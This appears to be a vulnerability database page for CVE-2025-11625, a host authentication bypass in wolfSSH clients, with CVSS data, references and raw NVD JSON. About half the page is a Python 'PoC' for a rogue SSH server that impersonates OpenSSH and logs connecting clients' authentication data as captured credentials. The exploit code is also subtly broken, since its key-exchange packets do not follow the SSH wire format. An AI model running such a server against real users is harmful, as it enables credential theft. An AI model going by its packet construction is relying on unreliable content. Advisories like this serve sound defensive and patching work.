CVE-2025-11625

Description

Improper host authentication vulnerability in wolfSSH version 1.4.20 and earlier clients that allows authentication bypass and leaking of clients credentials.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:* - VULNERABLE

wolfSSH <= 1.4.20

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11625 - wolfSSH Client Host Authentication Bypass PoC # This PoC demonstrates the concept of exploiting improper host authentication # in wolfSSH clients version 1.4.20 and earlier. import socket import threading import hashlib import struct import os class MaliciousSSHServer: """ A rogue SSH server that exploits the host authentication bypass vulnerability in wolfSSH clients (CVE-2025-11625). """ def __init__(self, host='0.0.0.0', port=2222): self.host = host self.port = port self.captured_credentials = [] # Generate a rogue host key (attacker-controlled) self.rogue_host_key = hashlib.sha256(os.urandom(32)).hexdigest() def generate_ssh_banner(self): """Generate SSH protocol banner""" return b"SSH-2.0-OpenSSH_8.9 RogueServer\r\n" def handle_client(self, client_socket, address): """Handle incoming SSH connection from vulnerable client""" try: print(f"[*] Connection from {address}") # Step 1: Send SSH banner banner = self.generate_ssh_banner() client_socket.send(banner) print(f"[*] Sent banner: {banner.strip()}") # Step 2: Receive client banner client_banner = client_socket.recv(1024) print(f"[*] Client banner: {client_banner.strip()}") # Step 3: Send KEXINIT with our rogue parameters # The vulnerable wolfSSH client will accept any host key kexinit = self.build_kexinit() client_socket.send(kexinit) print("[*] Sent KEXINIT with rogue host key") # Step 4: Receive client's KEXINIT client_kexinit = client_socket.recv(4096) print("[*] Received client KEXINIT") # Step 5: Send rogue ECDH key exchange reply # Since host authentication is bypassed, client accepts this kex_reply = self.build_kex_reply() client_socket.send(kex_reply) print("[*] Sent KEX reply with rogue host key") # Step 6: Wait for client's userauth request (credentials) auth_data = client_socket.recv(4096) if auth_data: print(f"[!] CAPTURED CREDENTIALS: {auth_data.hex()}") self.captured_credentials.append({ 'source': address, 'data': auth_data, 'timestamp': os.times() }) except Exception as e: print(f"[-] Error: {e}") finally: client_socket.close() def build_kexinit(self): """Build a malicious KEXINIT packet""" # Simplified - real implementation would follow SSH spec packet = b'\x00' * 16 # cookie packet += b'curve25519-sha256' + b'\x00' packet += b'ssh-rsa' + b'\x00' packet += b'[email protected]' + b'\x00' return packet def build_kex_reply(self): """Build KEX reply with rogue host key""" # KEX reply containing attacker's host key # Vulnerable client does not verify this against known_hosts reply = struct.pack('>I', 30) # SSH_MSG_KEX_ECDH_REPLY reply += b'\x00\x00\x00\x07ssh-rsa' # key type reply += os.urandom(256) # fake RSA public key return reply def start(self): """Start the malicious SSH server""" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((self.host, self.port)) server.listen(5) print(f"[*] Malicious SSH server listening on {self.host}:{self.port}") print("[*] Waiting for vulnerable wolfSSH clients...") while True: client, addr = server.accept() thread = threading.Thread(target=self.handle_client, args=(client, addr)) thread.daemon = True thread.start() if __name__ == "__main__": print("=" * 60) print("CVE-2025-11625 PoC - wolfSSH Host Authentication Bypass") print("=" * 60) server = MaliciousSSHServer(port=2222) try: server.start() except KeyboardInterrupt: print("\n[*] Server stopped") print(f"[*] Total credentials captured: {len(server.captured_credentials)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11625
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11625
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11625/
[4] VulDB https://vuldb.com/cve/CVE-2025-11625
[5] https://github.com/wolfSSL/wolfssh/pull/840

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11625", "sourceIdentifier": "[email protected]", "published": "2025-10-21T14:15:46.997", "lastModified": "2025-12-04T20:43:02.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper host authentication vulnerability in wolfSSH version 1.4.20 and earlier clients that allows authentication bypass and leaking of clients credentials."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:Red", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.20", "matchCriteriaId": "A41BD0CF-B12E-46A5-BB36-6CE244516A98"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssh/pull/840", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}